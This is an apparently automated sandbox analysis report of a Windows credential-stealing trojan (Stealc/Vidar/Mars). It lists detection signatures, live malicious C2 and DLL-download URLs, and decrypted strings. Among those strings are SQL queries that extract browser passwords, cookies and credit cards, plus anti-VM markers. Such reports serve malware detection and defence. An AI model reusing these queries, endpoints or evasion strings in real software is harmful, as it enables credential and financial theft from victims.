Windows Analysis Report
Wb9LZ5Sn1l.exe

Overview

General Information

Sample name: Wb9LZ5Sn1l.exe
renamed because original name is a hash value
Original sample name: 01154b040fe9e96aca2160a497171d64.exe
Analysis ID: 1435816
MD5: 01154b040fe9e96aca2160a497171d64
SHA1: d1c049633c359b9dc32a3d1b00a2bb046917f624
SHA256: bc96345b0e26373c92ee8e2f5d1171357c0401809a8ebdbfa00023f1a91c8744
Tags: 32exetrojan
Infos:

Detection

Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Overwrites Mozilla Firefox settings
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/nss3.dll Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dll Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll Avira URL Cloud: Label: malware
Source: https://shaffatta.com/d32e011d2eaa85a0/softokn3.dll Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: https://shaffatta.com/D Virustotal: Detection: 8% Perma Link
Source: https://shaffatta.com/fdca69ae739b4897.phpft Virustotal: Detection: 8% Perma Link
Source: https://shaffatta.com/fdca69ae739b4897.php Virustotal: Detection: 11% Perma Link
Source: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll Virustotal: Detection: 11% Perma Link
Source: https://shaffatta.com/fdca69ae739b4897.php& Virustotal: Detection: 8% Perma Link
Source: https://shaffatta.com/uments Virustotal: Detection: 8% Perma Link
Source: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll Virustotal: Detection: 6% Perma Link
Source: https://shaffatta.com/fdca69ae739b4897.phpX Virustotal: Detection: 10% Perma Link
Source: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll Virustotal: Detection: 6% Perma Link
Source: https://shaffatta.com/fdca69ae739b4897.phpm Virustotal: Detection: 8% Perma Link
Source: https://shaffatta.com/fdca69ae739b4897.phpindows Virustotal: Detection: 8% Perma Link
Source: https://shaffatta.com/fatta.com/uments Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for submitted file
Source: Wb9LZ5Sn1l.exe ReversingLabs: Detection: 47%
Source: Wb9LZ5Sn1l.exe Virustotal: Detection: 48% Perma Link
Machine Learning detection for sample
Source: Wb9LZ5Sn1l.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: lstrcatA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: OpenEventA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CreateEventA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CloseHandle
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Sleep
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: VirtualFree
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: lstrcpyA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: lstrlenA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: ExitProcess
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: user32.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: ntdll.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CreateDCA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: ReleaseDC
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: sscanf
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: VMwareVMware
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: HAL9TH
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: JohnDoe
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: DISPLAY
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: https://shaffatta.com
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: /fdca69ae739b4897.php
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: /d32e011d2eaa85a0/
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Install_2
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GlobalLock
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: HeapFree
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetFileSize
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GlobalSize
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Process32Next
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Process32First
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: DeleteFileA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: LocalFree
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: FindClose
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: ReadFile
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: WriteFile
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CreateFileA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CopyFileA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetLastError
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: lstrcpynA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GlobalFree
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: OpenProcess
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: TerminateProcess
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: ole32.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: wininet.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: shell32.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: psapi.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SelectObject
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: BitBlt
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: DeleteObject
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CreateCompatibleDC
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GdiplusStartup
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GdiplusShutdown
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GdipDisposeImage
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GdipFree
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CoUninitialize
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CoInitialize
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CoCreateInstance
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: BCryptDecrypt
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: BCryptSetProperty
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: BCryptDestroyKey
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetWindowRect
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetDesktopWindow
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetDC
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CloseWindow
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: wsprintfA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CharToOemW
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: wsprintfW
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: RegQueryValueExA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: RegEnumKeyExA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: RegOpenKeyExA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: RegCloseKey
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: RegEnumValueA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CryptUnprotectData
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SHGetFolderPathA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: ShellExecuteExA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: InternetOpenUrlA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: InternetConnectA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: InternetCloseHandle
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: InternetOpenA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: HttpSendRequestA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: HttpOpenRequestA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: InternetReadFile
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: InternetCrackUrlA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: StrCmpCA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: StrStrA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: StrCmpCW
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: PathMatchSpecA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: RmStartSession
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: RmRegisterResources
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: RmGetList
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: RmEndSession
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: sqlite3_open
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: sqlite3_step
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: sqlite3_column_text
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: sqlite3_finalize
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: sqlite3_close
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: sqlite3_column_bytes
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: sqlite3_column_blob
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: encrypted_key
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: PATH
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: NSS_Init
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: NSS_Shutdown
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: PK11_FreeSlot
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: PK11_Authenticate
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: C:\ProgramData\
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: browser:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: profile:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: url:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: login:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: password:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Opera
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: OperaGX
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Network
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: cookies
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: .txt
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: TRUE
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: FALSE
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: autofill
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: history
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: name:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: month:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: year:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: card:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Cookies
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Login Data
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Web Data
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: History
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: logins.json
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: formSubmitURL
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: usernameField
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: encryptedUsername
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: encryptedPassword
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: guid
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: cookies.sqlite
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: formhistory.sqlite
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: places.sqlite
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: plugins
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Local Extension Settings
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Sync Extension Settings
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: IndexedDB
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Opera Stable
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Opera GX Stable
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: CURRENT
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: chrome-extension_
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Local State
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: profiles.ini
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: chrome
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: opera
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: firefox
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: wallets
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: %08lX%04lX%lu
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: ProductName
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: ProcessorNameString
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: DisplayName
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: DisplayVersion
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Network Info:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - IP: IP?
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - Country: ISO?
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: System Summary:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - HWID:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - OS:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - Architecture:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - UserName:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - Computer Name:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - Local Time:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - UTC:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - Language:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - Keyboards:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - Laptop:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - Running Path:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - CPU:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - Threads:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - Cores:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - RAM:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - Display Resolution:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: - GPU:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: User Agents:
